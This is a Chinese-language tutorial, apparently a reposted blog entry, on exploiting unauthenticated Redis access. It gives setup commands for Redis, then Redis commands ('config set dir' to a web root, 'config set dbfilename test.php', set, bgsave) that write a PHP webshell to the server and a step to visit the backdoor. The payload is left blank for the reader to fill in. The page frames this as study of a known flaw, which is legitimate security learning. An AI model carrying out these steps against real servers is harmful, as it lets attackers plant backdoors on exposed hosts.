数据库服务类--Redis--未授权访问&终端Getshell
免责声明:本文仅做技术交流与学习.
目录
前提条件:
windows上开启redis服务:
Linux上创建&开启redis服务:
操作:
1-连接靶机redis
2-写入webshell
3-访问后门
redis--->webshell
Redis未授权访问漏洞复现与利用 - 知乎 (zhihu.com)
前提条件:
端口开放(6379)
目录结构清晰
windows上开启redis服务:
windows: redis-server.exe redis.windows.conf redis-cli.exe -h 127.0.0.1 -p 6379
Linux上创建&开启redis服务:
1、下载 wget http://download.redis.io/releases/redis-2.8.17.tar.gz 2、解压编译 tar xzvf redis-2.8.17.tar.gz #解压安装包 cd redis-2.8.17 # 进入redis目录 make #编译 3、配置及启动 cd src/ #进入src目录 cp redis-server /usr/bin/ cp redis-cli /usr/bin/ #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了) cd .. # 返回上一级目录 cp redis.conf /etc/ #将redis.conf拷贝到/etc/目录下 redis-server /etc/redis.conf # 使用/etc/目录下的redis.conf文件中的配置启动redis服务
操作:
1-连接靶机redis
2-写入webshell
config set dir /www/wwwroot/IP config set dbfilename test.php set test "" bgsave save
目录,文件名自己改
写入内容自己改...
3-访问后门路径
--上线...
免责声明:我们致力于保护作者版权,注重分享,被刊用文章因无法核实真实出处,未能及时与作者取得联系,或有版权异议的,请联系管理员,我们会立即处理! 部分文章是来自自研大数据AI进行生成,内容摘自(百度百科,百度知道,头条百科,中国民法典,刑法,牛津词典,新华词典,汉语词典,国家院校,科普平台)等数据,内容仅供学习参考,不准确地方联系删除处理! 图片声明:本站部分配图来自人工智能系统AI生成,觅知网授权图片,PxHere摄影无版权图库和百度,360,搜狗等多加搜索引擎自动关键词搜索配图,如有侵权的图片,请第一时间联系我们,邮箱:ciyunidc@ciyunshuju.com。本站只作为美观性配图使用,无任何非法侵犯第三方意图,一切解释权归图片著作权方,本站不承担任何责任。如有恶意碰瓷者,必当奉陪到底严惩不贷!
